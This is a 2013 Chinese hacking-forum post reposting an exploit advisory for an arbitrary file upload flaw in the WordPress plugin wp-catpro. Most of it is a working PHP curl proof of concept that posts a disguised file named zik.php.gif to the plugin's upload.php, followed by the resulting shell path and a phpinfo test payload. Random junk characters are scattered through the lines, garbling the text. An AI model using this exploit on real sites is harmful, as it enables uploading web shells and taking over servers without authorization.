找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2077|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
7 i; ^$ O3 R2 o5 C#-----------------------------------------------------------------------4 ^9 f! g2 O0 H3 }. O! l3 {  P5 z+ K, U
# k" C% h# k; y: O2 x
作者  => Zikou-165 p* N' |+ s+ J' I+ f. a. |5 i
邮箱 => zikou16x@gmail.com5 _# w9 r) T& W9 B6 d/ S4 v
测试系统 : Windows 7 , Backtrack 5r3/ W' b5 Q8 j: U; G
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
; c* k& [! u1 N( t( H3 j##### R" p0 Q) Z8 H9 [4 Q
; D$ X, h" |9 p: |# _: l
#=> Exploit 信息:
1 V4 ?; e# l" x, [4 o------------------
; W) R( `- y6 @$ J# |# 攻击者可以上传 file/shell.php.gif
) b0 |' o* l1 m( J) I, \; x. m2 Z; W# ("jpg", "gif", "png")  // Allowed file extensions
7 E: @. j' Z. x- w9 Y# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)2 |; s8 Y8 r+ o; Q5 R  C9 F
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ R0 f: e+ F3 N1 ~' s: `% V------------------
: S0 J) Y6 j) Z+ l; A. y
" r$ ^" h0 a9 f7 L4 h#=> Exploit
% e7 S# r3 G+ V, O$ U" ?* z8 j-----------
; W$ @1 ~- U; `<?php8 Y6 h2 f' _1 L9 ~8 u+ {8 L( e/ {

+ P4 ]4 A& H( M" [- ?/ F+ ~% z$uploadfile="zik.php.gif";: ]% D# R1 o& T# B  L
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");% i, i# T4 w. Y+ O8 J
curl_setopt($ch, CURLOPT_POST, true);9 c+ @. C$ s$ Q' o* W
curl_setopt($ch, CURLOPT_POSTFIELDS,6 q! ~; L& v* M& U( P& u) ^( t
array('Filedata'=>"@$uploadfile",3 g2 X- _5 I4 C" o$ _
'folder'=>'/wp-content/uploads/catpro/'));2 X8 p5 a% G5 K# E; l3 ^. Q
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);" `" S3 B3 v: B4 @' t
$postResult = curl_exec($ch);  S4 E  A5 Z. U+ F$ w! j3 n, G, M
curl_close($ch);( v' g- a% q% F4 k9 Y2 R' |! A' Y( s

0 S& \0 l: g  J. t) U+ iprint "$postResult";
4 d: l3 {- ?7 v& q ( E* w. ^+ Z4 ~. K
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif0 q% Z. a& t3 `+ J" C
  ?>
2 Y3 r4 \$ G# X+ r<?php. E$ p/ T; ], L1 P* T  W8 q
phpinfo();
" e" c( n% B! A: n7 h- Q" n; m2 p?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表